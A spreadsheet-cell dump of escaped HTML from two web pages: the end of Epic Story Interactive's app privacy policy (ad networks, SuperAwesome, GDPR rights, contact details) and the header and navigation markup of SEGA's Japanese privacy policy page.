	&lt;li&gt; In connection with or during negotiation of any merger, financing, acquisition, bankruptcy, dissolution, transaction, or proceeding involving sale, transfer, divestiture, or disclosure of all or a portion of our business or assets for use in accordance with applicable law&lt;/li&gt;
	&lt;li&gt;Advertising network companies to correlate your interaction with an advertisement to an action that involves installing or operating a mobile application related to the advertisement.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; We do not share your personal information with advertising network companies for the purposes of behavioral ad targeting.</t>
  </si>
  <si>
    <t>All advertising displayed in the App are contextual advertisements that are selected based on demographic data and not based on a personal profile of your online behavior. We use or may use the following advertising network companies:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;AdColony &lt;a href="https://www.adcolony.com/privacy-policy/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;AppLovin &lt;a href="https://www.applovin.com/privacy/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Chartboost &lt;a href="https://answers.chartboost.com/en-us/articles/200780269"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Fyber &lt;a href="https://www.fyber.com/services-privacy-statement/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;ironSource &lt;a href="https://developers.ironsrc.com/ironsource-mobile/unity/ironsource-mobile-privacy-policy/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Kidoz &lt;a href="https://kidoz.net/website-and-kidoz-sdk-privacy-policy/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;SuperAwesome &lt;a href="#superawesome"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Unity Ads &lt;a href="https://unity3d.com/legal/privacy-policy"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Vungle &lt;a href="https://vungle.com/privacy/"&gt;(privacy policy)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="superawesome"&gt;SuperAwesome&lt;/h3&gt;
&lt;p&gt; Our game may display contextual advertisements served by SuperAwesome Trading Limited (“SuperAwesome”), a provider of kid-safe advertising services that are designed specifically for the compliance requirements of younger audiences, including those aged under the age of digital consent.&lt;/p&gt;
&lt;p&gt;SuperAwesome is certified as COPPA-compliant by the kidSAFE Seal Program, an FTC-Approved COPPA Safe Harbor Program.</t>
  </si>
  <si>
    <t>Please go to www.kidsafeseal.com for more information.&lt;/p&gt;
&lt;p&gt; SuperAwesome is a valid licensee, and participating member, of the Entertainment Software Rating Board’s Privacy Certified Program (“ESRB Privacy Certified”). To protect your privacy, SuperAwesome has voluntarily undertaken this privacy initiative, and its services have been reviewed and certified by ESRB Privacy Certified to meet established online information collection, use and disclosure practices.</t>
  </si>
  <si>
    <t>As a licensee of this privacy program, SuperAwesome’s services are subject to frequent audits and other enforcement and accountability mechanisms administered independently by ESRB Privacy Certified.&lt;/p&gt;
&lt;p&gt;SuperAwesome also provides advertising services in compliance with the General Data Protection Regulation (EU 1996/679) and the California Consumer Privacy Act (CCPA). Adopting an approach of ‘privacy by design and by default’, SuperAwesome utilises proprietary technologies so that it neither collects, stores nor shares your personal data to provision advertisements or target advertising to you. SuperAwesome acts as a service provider, as defined by the CCPA, and does not use data collected from children under the age of 16 for any purpose other than to provide contextual advertising for our game.&lt;/p&gt;
&lt;p&gt;You may contact SuperAwesome directly at privacy@superawesome.com on + 44 (0) 203 668 6677, or by post: Privacy Team, SuperAwesome Trading Limited, 8 Duncannon Street, London, England, WC2N 4JF, United Kingdom.&lt;/p&gt;
&lt;h2&gt;Security&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>ESI takes reasonable measures to help protect information about you from loss, theft, misuse and unauthorized access, disclosure, alteration and destruction.&lt;/p&gt;
&lt;h2&gt; Your Rights to Your Personal Information&lt;/h2&gt;
&lt;p&gt;If you are an individual subject to EU law, you have the following rights:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;A right to be informed of the ways in which we use your information&lt;/li&gt;
	&lt;li&gt;A right to request from ESI access to and rectification or erasure of personal information, and certain rights to data portability&lt;/li&gt;
	&lt;li&gt;A right to object to the processing of your personal information or obtain a restriction of such processing under certain circumstances&lt;/li&gt;
	&lt;li&gt;If the processing of personal data is based on your consent, a right to withdraw consent at any time (without affecting the lawfulness of processing before its withdrawal)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We process and answer your requests without undue delay and in any event within one month of our receipt of the request unless a longer period is required due to the complexity of the request. In this case, our response time can be up to three months in total as permitted by Article 12 of the GDPR.&lt;/p&gt;
&lt;p&gt;If you wish to use any of the rights described above, you may contact us at any time by emailing us at support@epicstoryinteractive.com.&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Right to rectification and erasure&lt;/h2&gt;
&lt;p&gt; You have the right to have inaccurate personal data rectified, see Article 16 of the GDPR.&lt;/p&gt;
&lt;p&gt; Furthermore, you have the right to have your personal data erased where one of the following grounds applies, see Article 17 of the GDPR:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;the personal data are no longer necessary in relation to the purposes for which they were collected or otherwise processed&lt;/li&gt;
	&lt;li&gt;if you have withdrawn your consent and there are no other legal grounds for the processing&lt;/li&gt;
	&lt;li&gt;if you have objected to the processing and there are no overriding legitimate grounds for the processing&lt;/li&gt;
	&lt;li&gt;the personal data have to be erased for compliance with a legal obligation in Union or Member State law&lt;/li&gt;
	&lt;li&gt;the personal data have been unlawfully processed&lt;/li&gt;
	&lt;li&gt;the personal data have been collected in relation to the offer of information society services.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please note that your right to erasure may be limited if the data are necessary for compliance with a legal obligation or for the establishment, exercise or defense of legal claims.&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Right to restriction&lt;/h2&gt;
&lt;p&gt;You have the right to obtain restriction of processing in certain circumstances, see Article 18 of the GDPR. If you have the right to restriction, we will only process your data with your consent or for the establishment, exercise or defense of a legal claim or to protect a person or important grounds of public interest.&lt;/p&gt;
&lt;h2&gt; Right to withdraw consent&lt;/h2&gt;
&lt;p&gt;If we have asked for your consent to our processing of your data, you have the right to withdraw your consent at any time, see Article 7 of the GDPR.</t>
  </si>
  <si>
    <t xml:space="preserve">If you withdraw your consent, we will cease processing of the data for which you have withdrawn consent, unless we have a legal obligation to keep some or parts of your data.&lt;/p&gt;
&lt;p&gt;Please note that if you withdraw your consent, your user license to use the App will cease automatically. The withdrawal of your consent does not affect the lawfulness of processing based on your consent before its withdrawal.&lt;/p&gt;
&lt;h2&gt; Right to data portability &lt;/h2&gt;
&lt;p&gt;You have the right to receive the personal data you have provided us with which we process in a structured, commonly used and machine-readable format and have the right to transmit those data to another controller if the processing is based on consent or contract performance, see Article 20 of the GDPR.&lt;/p&gt;
&lt;h2&gt;Contact and complaints&lt;/h2&gt;
&lt;p&gt;ESI has the following contact information:&lt;/p&gt;
&lt;p&gt;Epic Story Interactive Inc.&lt;br/&gt;
1750-1055 W Georgia St&lt;br/&gt;
PO Box 11125&lt;br/&gt;
Vancouver, BC&lt;br/&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">V6E 3P3&lt;br/&gt;
Canada&lt;br/&gt;&lt;br/&gt;
Phone: +1-604-559-5579&lt;br/&gt;
E-mail: support@epicstory.atlassian.net&lt;/p&gt;
&lt;p&gt;If you wish to make a complaint over the processing of your personal data, you have the right to lodge a complaint to the relevant supervisory authority.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;script&gt;
// Used to toggle the menu on small screens when clicking on the menu button
function myFunction() {
    var x = document.getElementById("navDemo");
    if (x.className.indexOf("w3-show") == -1) {
        x.className += " w3-show";
    } else { 
        x.className = x.className.replace(" w3-show", "");
    }
}
&lt;/script&gt;
&lt;!-- Service desk widget --&gt;
&lt;script data-jsd-embedded data-key="d08e585f-f025-4a92-85b5-8fab59613530" data-base-url="https://jsd-widget.atlassian.com" src="https://jsd-widget.atlassian.com/assets/embed.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="ja"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta name="nsls:timestamp" content="Wed, 08 Dec 2021 01:00:00 GMT"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;_x005F_x000D_
&lt;meta http-equiv="Cache-Control" content="no-cache"&gt;_x005F_x000D_
&lt;meta http-equiv="Pragma" content="no-cache"&gt;_x005F_x000D_
&lt;meta http-equiv="Expires" content="0"&gt;_x005F_x000D_
 &lt;meta charset="utf-8"&gt;_x005F_x000D_
&lt;title&gt;プライバシーポリシー ｜ 株式会社セガ&lt;/title&gt;_x005F_x000D_
&lt;meta name="author" content="(c)SEGA"&gt;_x005F_x000D_
&lt;meta name="description" content="株式会社セガのプライバシーポリシーを掲載しております。"&gt;_x005F_x000D_
&lt;meta name="keywords" content="SEGA,セガコーポレートサイト, プライバシーポリシー"&gt;_x005F_x000D_
&lt;meta name="twitter:card" content="summary_large_image"&gt;_x005F_x000D_
&lt;meta property="og:type" content="artcle"&gt;_x005F_x000D_
_x005F_x000D_
&lt;meta property="og:title" content="株式会社セガ"&gt;_x005F_x000D_
&lt;meta property="og:site_name" content="株式会社セガ"&gt;_x005F_x000D_
&lt;meta property="og:url" content="https://www.sega.co.jp/"&gt;_x005F_x000D_
&lt;meta property="og:image" content="https://www.sega.co.jp/common/images/ogp_image.png"&gt;_x005F_x000D_
&lt;meta property="og:description" content="株式会社セガのプライバシーポリシーをご覧になれます。"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;_x005F_x000D_
&lt;link rel="apple-touch-icon-precomposed" href="../common/images/apple-touch-icon.png"&gt;_x005F_x000D_
&lt;link rel="shortcut icon" href="../common/images/favicon.ico"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;link href="..</t>
  </si>
  <si>
    <t>/common/css/reset.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link href=".. /common/css/base.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link href="../common/css/nav.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link href=".. /common/css/other.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link href="..</t>
  </si>
  <si>
    <t xml:space="preserve">/common/css/animate.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Noto+Sans+JP:500,700" media="only screen and (min-width:1000px)"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Oswald:400,500"&gt;_x005F_x000D_
&lt;link href="https://use.fontawesome.com/releases/v5.6.1/css/all.css" rel="stylesheet"&gt;_x005F_x000D_
&lt;script type="text/javascript" src="../common/js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="../common/js/smoothscroll.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="../common/js/jquery.inview.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="../common/js/custom.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
&lt;!--[if lte IE 9]&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  </t>
  </si>
  <si>
    <t>location.href = '//sega.co.jp/unsupported.html';_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;! [endif]--&gt;_x005F_x000D_
	_x005F_x000D_
&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':_x005F_x000D_
new Date().getTime(),event:'gtm.js'});var</t>
  </si>
  <si>
    <t>f=d.getElementsByTagName(s)[0],_x005F_x000D_
 j =d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=_x005F_x000D_
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);_x005F_x000D_
})(window,document,'script','dataLayer','GTM-N85KQCV');&lt;/script&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager --&gt;_x005F_x000D_
	_ x000D_
&lt;/head&gt;_x005F_x000D_
 _x005F_x000D_
&lt;body&gt;_x005F_x000D_
	_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Google Tag Manager (noscript) --&gt;_x005F_x000D_
&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N85KQCV"_x005F_x000D_
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End Google Tag Manager (noscript) --&gt;_x005F_x000D_
_x005F_x000D_
	_ x000D_
</t>
  </si>
  <si>
    <t>&lt;div id="wrap"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div id="other_title-key"&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div id="key_img" class="ir_00"&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class="cover_01"&gt;&lt;/div&gt;_x005F_x000D_
&lt;div class="cover_02 animated box_fadeInLeft"&gt;&lt;/div&gt;_x005F_x000D_
&lt;h2 class="title animated box_fadeIn"&gt;&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
_ x000D_
&lt;link href="/common/css/search_form.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;link href="/common/css/search.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
_x005F_x000D_
&lt;header id="top_header"&gt;_x005F_x000D_
&lt;div class="inner"&gt;_x005F_x000D_
  &lt;div class="logo_box"&gt;_x005F_x000D_
  &lt;div class="logo animated box_fadeIn"&gt;&lt;a href="/index.html"&gt;&lt;img src="/common/images/logo-sega.svg" alt=""/&gt;&lt;span class="pc-tb pc_1310"&gt;SEGA CORPORATION&lt;/span&gt;&lt;/a&gt;&lt;span&gt;株式会社セガ&lt;/span&gt;&lt;/div&gt;_x005F_x000D_
  &lt;h1&gt;株式会社セガ&lt;/h1&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
  _x005F_x000D_
  &lt;div class="g_nav_bg"&gt;&lt;/div&gt;_x005F_x000D_
  &lt;nav class="g_nav"&gt;_x005F_x000D_
  &lt;ul class="menu_li"&gt;_x005F_x000D_
    &lt; li&gt;&lt;a class="m_top" href="/index.html"&gt;&lt;i class="fas fa-home txt_b"&gt;&lt;/i&gt; &lt;span&gt;トップ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_release" href="/release/index.html"&gt;&lt;i class="far fa-newspaper txt_b"&gt;&lt;/i&gt; &lt;span&gt;お知らせ&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt;NEWS&lt;span&gt;お知らせ&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_news.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
		    &lt;ul&gt;_x005F_x000D_
			&lt;li&gt;&lt;a href="/release/index.html"&gt;2023&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;li&gt;&lt;a href="/release/index.html?year=2022"&gt;2022&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;li&gt;&lt;a href="/release/index.html?year=2021"&gt;2021&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;li&gt;&lt;a href="/release/index.html?year=2020"&gt;2020&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		    &lt;ul class="etc_li"&gt;_x005F_x000D_
			  &lt;li&gt;アーカイブ&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/release/sega-group/index.html"&gt;- 株式会社セガグループ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/release/sega-games/index.html"&gt;- 株式会社セガゲームス&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/release/sega-interactive/index.html"&gt;- 株式会社セガ・インタラクティブ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;!--</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="https://sega-net.com/release/"&gt;- 株式会社セガネットワークス、旧セガネットワークスカンパニー&lt;/a&gt;&lt;/li&gt; --&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
	&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_company" href="/company/index.html"&gt;&lt;i class="far fa-building txt_b"&gt;&lt;/i&gt; &lt;span&gt;会社情報&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt;COMPANY&lt;span&gt;会社情報&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_company.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
            &lt;ul&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/company/outline/index.html"&gt;会社概要&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/company/services/index.html"&gt;事業内容&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/company/message/index.html"&gt;代表者メッセージ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/company/history/index.html"&gt;沿革&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/company/access/index.html"&gt;アクセス&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		    &lt;ul class="etc_li"&gt;_x005F_x000D_
			  &lt;li class="img_link"&gt;&lt;a href="https://sega.jp/" target="_blank"&gt;&lt;img src="/common/images/link_productsite.jpg" width="345" height="110" alt="セガ製品情報サイト"/&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
    &lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_group" href="/group/index.html"&gt;&lt;i class="fas fa-dice-d20 txt_b"&gt;&lt;/i&gt; &lt;span&gt;セガグループ&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt;SEGA GROUP&lt;span&gt;セガグループ&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_group.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
            &lt;ul&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/group/summary/index.html"&gt;グループ事業概要&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/group/list/index.html"&gt;グループ企業一覧&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/group/ci/index.html"&gt;コーポレートアイデンティティ&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
    &lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_recruit" href="/recruit/index.html" target="_blank"&gt;&lt;i class="fas fa-users txt_b"&gt;&lt;/i&gt; &lt;span&gt;採用情報&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt; RECRUIT&lt;span&gt;採用情報&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_recruit.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
            &lt;ul&gt;_x005F_x000D_
			  &lt;li&gt;株式会社セガ&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/recruit/fresh/index.html" target="_blank"&gt;- 新卒採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/recruit/career/index.html" target="_blank"&gt;- 中途採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/recruit/parttime/index.html" target="_blank"&gt;- アルバイト採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/recruit/disabled/index.html" target="_blank"&gt;- 障がい者採用&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="/recruit/fresh/internship/index.html" target="_blank"&gt;- インターンシップ情報&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		    &lt;ul class="etc_li"&gt;_x005F_x000D_
			  &lt;li&gt;セガグループ&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="https://recruit.sega.jp/" target="_blank"&gt;- 新卒採用 &lt;i class="fas</t>
  </si>
  <si>
    <t xml:space="preserve">fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
         &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
	&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_ir" href="/ir/index.html"&gt;&lt;i class="fas fa-chart-line txt_b"&gt;&lt;/i&gt; &lt;span&gt;投資家情報&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt;IR&lt;span&gt;投資家情報&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_ir.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
            &lt;ul&gt;_x005F_x000D_
			  &lt; li&gt;&lt;a href="https://www.segasammy.co.jp/japanese/ir/library/" target="_blank"&gt;投資家情報 &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/ir/koukoku.html"&gt;電子公告&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
	&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_contact" href="/contact/index.html"&gt;&lt;i class="far fa-comment-dots txt_b"&gt;&lt;/i&gt; &lt;span&gt;お問い合わせ&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
      &lt;div class="mdd_wrap"&gt;_x005F_x000D_
        &lt;div class="mdd_inner"&gt;_x005F_x000D_
		  &lt;div class="mdd_content"&gt;_x005F_x000D_
			&lt;h3&gt;CONTACT&lt;span&gt;お問い合わせ&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
			&lt;div class="menu_img"&gt;&lt;img src="/common/images/menu_icon_contact.png" width="275" height="145" alt=""/&gt;&lt;/div&gt;_x005F_x000D_
            &lt; ul&gt;_x005F_x000D_
			  &lt;li&gt;個人のお客様&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="https://www.sega.jp/contact/soft/" target="_blank"&gt;- 家庭用ゲーム・PCゲーム &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;a href="https://www.sega.jp/contact/kt/" target="_blank"&gt;- スマートフォンコンテンツ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt; li&gt;&lt;a href="https://www.sega.jp/contact/arcade/" target="_blank"&gt;- アーケードゲーム &lt;i class="fas</t>
  </si>
  <si>
    <t>fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt; li&gt;&lt;a href="https://www.sega.jp/contact/prize/" target="_blank"&gt;- セガプライズ・セガ ラッキーくじ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="https://www.sega.jp/contact/" target="_blank"&gt;- その他のお問い合わせ &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		    &lt;ul class="etc_li"&gt;_x005F_x000D_
			  &lt;li&gt;法人のお客様&lt;/li&gt;_x005F_x000D_
			  &lt;li&gt;&lt;a href="https://www.sega.jp/business/" target="_blank"&gt;- 法人のお客様 &lt;i class="fas fa-external-link-alt"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
		  &lt;/div&gt;_x005F_x000D_
         &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
	&lt;/li&gt;_x005F_x000D_
  &lt;/ul&gt;_x005F_x000D_
  &lt;/nav&gt;_x005F_x000D_
	_x005F_x000D_
  &lt;nav class="h_nav"&gt;_x005F_x000D_
	  &lt;div class="h_nav_logo sp_only"&gt;&lt;a href="/index.html"&gt;&lt;img src="/common/images/logo-sega_w.svg" alt=""/&gt;&lt;/a&gt;&lt;br&gt;_x005F_x000D_
	  株式会社セガ&lt;/div&gt;_x005F_x000D_
  &lt;ul class="menu_li sp_only"&gt;_x005F_x000D_
    &lt;</t>
  </si>
  <si>
    <t xml:space="preserve">li&gt;&lt;a class="m_top" href="/index.html"&gt;&lt;i class="fas fa-home txt_b"&gt;&lt;/i&gt; &lt;span&gt;トップ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_release" href="/release/index.html"&gt;&lt;i class="far fa-newspaper txt_b"&gt;&lt;/i&gt; &lt;span&gt;お知らせ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_company" href="/company/index.html"&gt;&lt;i class="far fa-building txt_b"&gt;&lt;/i&gt; &lt;span&gt;会社情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_group" href="/group/index.html"&gt;&lt;i class="fas fa-dice-d20 txt_b"&gt;&lt;/i&gt; &lt;span&gt;セガグループ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_recruit" href="/recruit/index.html" target="_blank"&gt;&lt;i class="fas fa-users txt_b"&gt;&lt;/i&gt; &lt;span&gt;採用情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_ir" href="/ir/index.html"&gt;&lt;i class="fas fa-chart-line txt_b"&gt;&lt;/i&gt; &lt;span&gt;投資家情報&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;&lt;a class="m_contact" href="/contact/index.html"&gt;&lt;i class="far fa-comment-dots txt_b"&gt;&lt;/i&gt; &lt;span&gt;お問い合わせ&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
  &lt;/ul&gt;_x005F_x000D_
  &lt;/nav&gt;_x005F_x000D_
	_x005F_x000D_
      &lt;div class="nav_box"&gt;_x005F_x000D_
      &lt;div class="header_nav"&gt;_x005F_x000D_
          &lt;span class="nav_line nav_line1"&gt;&lt;/span&gt;_x005F_x000D_
          &lt;span class="nav_line nav_line2"&gt;&lt;/span&gt;_x005F_x000D_
          &lt;span class="nav_line nav_line3"&gt;&lt;/span&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
    &lt;main class="l_main"&gt;_x005F_x000D_
